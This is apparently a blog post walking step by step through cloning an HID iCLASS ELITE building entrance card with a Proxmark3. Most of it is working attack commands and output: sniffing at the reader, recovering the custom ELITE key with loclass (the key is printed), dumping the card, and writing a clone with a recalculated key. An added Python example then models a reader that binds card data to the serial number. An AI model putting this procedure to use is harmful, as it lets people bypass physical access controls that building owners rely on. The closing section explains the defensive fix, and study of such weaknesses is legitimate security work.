Clone my apartment entrance card

lff l
Dec 27, 2022

The management office of my apartment gave me 5 cards, which look like this:

[Image: card, labeled HID / iCLASS]

Since the management office does not issue additional cards, I wanted to try cloning one myself with my Proxmark3.

First try: get the info from the existing cards

Connect pm3 to the laptop, put one card on the HF antenna and run

hf search

pm3 detects this as an HID iCLASS/PicoPass card, and the command

hf ic info

returns some basic card information, including the CSN.

However, running the command hf ic chk -f iclass_default_keys.dic finds no key:

[+] loaded 11 keys from dictionary file C:\Working\ProxSpace\pm3\proxmark3\client\dictionaries/iclass_default_keys.dic
[+] Reading tag CSN / CCNR...
[+] CSN: 02 15 9F 00 F8 FF 12 E0
[+] CCNR: FC E1 FF FF FF FF FF FF 00 00 00 00
[=] Generating diversified keys
[+] Searching for DEBIT key...
[/]Chunk [000/11]
[+] time in iclass chk 2.3 seconds

which means none of the default keys work. This is a dead end.

Second try: use pm3 to run an online sniff

Connect pm3 to the laptop and run the command

hf iclass sim 2

Then take the laptop with the pm3 (keep the USB cable connected!) to the entrance of the building and place the pm3 HF antenna near the card reader.

This time pm3 logs some data, which is saved as iclass_mac_attack.bin.

With this file, run the command hf iclass loclass -f iclass_mac_attack.bin. After a few seconds pm3 should report the key it recovered:

High security custom key (Kcus):
Std format = 8fa250c3cb61f41c
Iclass format = 5b7c62c491c11b39
Key verified ok!

OK, we have moved one step forward. Let's play with this recovered key.

Third try: read card data with the key

The key recovered in the previous step is 5b7c62c491c11b39, so I tried to dump the data with this key:

pm3 --> hf ic dump --key 5b7c62c491c11b39

Failed to communicate with card

Same error for the other key 8fa250c3cb61f41c.

Then I tried with the --elite parameter:

pm3 --> hf ic dump --key 5b7c62c491c11b39 --elite

Oh! This time pm3 reads the data out:

[usb] pm3 --> hf ic dump --key 5b7c62c491c11b39 --elite
[=] Card has at least 2 application areas. AA1 limit 18 (0x12) AA2 limit 31 (0x1F)
.

[=] --------------------------- Tag memory ----------------------------

[=] block# | data | ascii |lck| info
[=] ---------+-------------------------+----------+---+----------------
[=] 0/0x00 | 02 15 9F 00 F8 FF 12 E0 | .F...... | | CSN

------- block 0x01 to 0x18 omitted

[=] ---------+-------------------------+----------+---+----------------
[?] yellow = legacy credential

[+] saving dump file - 19 blocks read
[+] saved 152 bytes to binary file hf-iclass-02159F00F8FF12E0-dump.bin
[+] saved 19 blocks to text file hf-iclass-02159F00F8FF12E0-dump.eml
[+] saved to json file hf-iclass-02159F00F8FF12E0-dump.json
[?] Try `hf iclass decrypt -f` to decrypt dump file
[?] Try `hf iclass view -f` to view dump file

With all the data dumped, this is a big step forward.

Fourth try: write the dumped data to a new card

Put the newly bought HID iCLASS card on the pm3 and run the command

pm3 --> hf ic chk -f iclass_default_keys.dic

This time the default key AEA684A6DAB23278 is reported as working.

Then write the dump from the previous step to this card:

pm3 --> hf iclass restore -f hf-iclass-02159F00F8FF12E0-dump.json --first 6 --last 18 --ki 0

Done. Now I have a new card with the data restored from the dumped files.

Will it work? I tried it at the card reader. No luck.

Think about it carefully. Now we have 2 cards:

  1. Original card: its data must be read with the --elite argument and the sniffed key;
  2. Cloned card: its data must be read without the --elite argument, with the default key.

Hmm... They seem quite different. That's why the cloned card cannot be used.

Fifth try: update the cloned card to ELITE

Since the original card is an ELITE card (read with --elite), can we upgrade the cloned card to ELITE as well?

Run the following command on the cloned card with pm3:

[usb] pm3 --> hf iclass calcnewkey --oki 0 --new 5b7c62c491c11b39 --elite
[+] Using old key[0]... AE A6 84 A6 DA B2 32 78
[+] CSN 02 15 9F 00 F8 FF 12 E0
[+] epurse FE FF FF FF FF FF FF FF
[+] Old div key......... 12 4F 36 D4 96 2F 1E 33
[+] New div key......... D9 A3 01 95 9E AD DF 44
[+] Xor div key......... 5C 2F 43 71 B6 D6 A6 A3

Then write the calculated key (Xor div key) to block 3 of the card:

[usb] pm3 --> hf ic wrbl -b 3 -d 5C2F4371B6D6A6A3  --ki 0

Now the card has been updated to ELITE format.

Verify: reading with the default key will fail, as the card has been upgraded to ELITE:

pm3 --> hf ic rdbl -b 4 --ki 0

Reading with --elite will succeed:

pm3 --> hf ic rdbl -b 4 --key 5b7c62c491c11b39 --elite

Dumping with --elite should succeed:

pm3 --> hf ic dump --key 5b7c62c491c11b39 --elite

So now we have 2 ELITE cards: one is the original, the other is the clone.

Make sure BOTH have the same data from block 3 to block 18.

If not, copy the data from the original and write it to the cloned card, for example:

pm3 --> hf ic wrbl -b 5 -d 1122334455667788 --key 5b7c62c491c11b39 --elite

(1122334455667788 is copied from the original card's dump, block 5.)

And now we have 2 cards that are:
1. Both ELITE;
2. Identical in all data sections;
3. Readable with the same ELITE key.

The only difference is the CSN, which means that if there is some checksum binding the data to the CSN, our cloned card will not work.

But let's try...

Take the cloned card to the reader and scan it...

Ohh!! It works!!

It looks like the card reader:

  1. Only reads the card with the ELITE key;
  2. Verifies certain data in the user data section;
  3. Has no checksum binding the data to the CSN.
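The three observations above describe a reader that checks the content of the user blocks but never ties that content to the card's CSN. The following is an added example, not code from this post or from any HID product: a toy Python model of both reader designs, comparing the naive check the post observed with one where the issuer stores a MAC over CSN || payload in the user area. The clone CSN, the issuer key, the tag length and the check logic are assumptions made up for the example; only the original CSN and the block-5 bytes come from the post. A block-for-block copy with a different CSN passes the first design and fails the second.

```python
import hashlib
import hmac

# Constructed sample values. The original CSN and the block-5 bytes are the ones
# shown in the post; the clone CSN and the issuer key are placeholders made up here.
ORIGINAL_CSN = bytes.fromhex("02159F00F8FF12E0")
CLONE_CSN = bytes.fromhex("0102030405060708")   # constructed: whatever CSN the blank card has
USER_DATA = bytes.fromhex("1122334455667788")   # the block-5 payload from the dump
ISSUER_KEY = b"constructed-issuer-key-not-a-real-secret"
TAG_LEN = 8                                      # one iCLASS block worth of MAC


def personalise(issuer_key: bytes, csn: bytes, payload: bytes) -> bytes:
    """Issuer side: the bytes written into the user-data blocks at personalisation.

    The payload is followed by a MAC over CSN || payload, so the same bytes are
    only valid on the card that carries this CSN."""
    tag = hmac.new(issuer_key, csn + payload, hashlib.sha256).digest()[:TAG_LEN]
    return payload + tag


def naive_reader_accepts(csn: bytes, user_blocks: bytes, enrolled_blocks: bytes) -> bool:
    """Reader behaviour the post observed: compare the user-data bytes against the
    enrolled copy and ignore the CSN entirely. Any card carrying the same bytes passes."""
    del csn  # deliberately unused: this reader never looks at the serial
    return hmac.compare_digest(user_blocks, enrolled_blocks)


def bound_reader_accepts(verify_key: bytes, csn: bytes, user_blocks: bytes) -> bool:
    """Reader behaviour with CSN binding: recompute the MAC over the CSN it just read
    plus the payload, and compare it with the tag stored on the card."""
    if len(user_blocks) <= TAG_LEN:
        return False  # no room for a payload and a tag: malformed card
    payload, tag = user_blocks[:-TAG_LEN], user_blocks[-TAG_LEN:]
    expected = hmac.new(verify_key, csn + payload, hashlib.sha256).digest()[:TAG_LEN]
    return hmac.compare_digest(tag, expected)


def run_scenario() -> dict:
    """Present the original card and a block-for-block copy to both reader designs."""
    original_blocks = personalise(ISSUER_KEY, ORIGINAL_CSN, USER_DATA)
    cloned_blocks = original_blocks  # the clone carries identical user blocks, as in the post
    return {
        "naive_original": naive_reader_accepts(ORIGINAL_CSN, original_blocks, original_blocks),
        "naive_clone": naive_reader_accepts(CLONE_CSN, cloned_blocks, original_blocks),
        "bound_original": bound_reader_accepts(ISSUER_KEY, ORIGINAL_CSN, original_blocks),
        "bound_clone": bound_reader_accepts(ISSUER_KEY, CLONE_CSN, cloned_blocks),
    }


if __name__ == "__main__":
    for check, accepted in run_scenario().items():
        print(f"{check:15s} -> {'accepted' if accepted else 'rejected'}")
```

The binding only buys something while the CSN is fixed by the card manufacturer and the verification key stays out of reach; the post shows the ELITE key itself being recovered at the reader, so binding is an extra layer on top of key management, not a substitute for it.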
